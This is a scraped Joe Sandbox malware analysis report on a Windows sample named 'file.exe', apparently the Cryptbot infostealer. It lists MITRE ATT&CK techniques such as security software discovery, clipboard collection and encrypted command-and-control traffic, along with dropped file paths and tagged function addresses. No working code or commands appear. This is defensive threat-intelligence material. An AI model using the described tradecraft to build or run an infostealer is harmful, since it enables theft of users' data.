Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\LYgbAXPoWKdcsgBzdWtH.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 0079116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 007915B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C9D14B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C9E9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 007981E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Function 00798230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Function 007913C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 007911A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00791160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C9E9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00791296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 007913BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C9EB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C9EB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON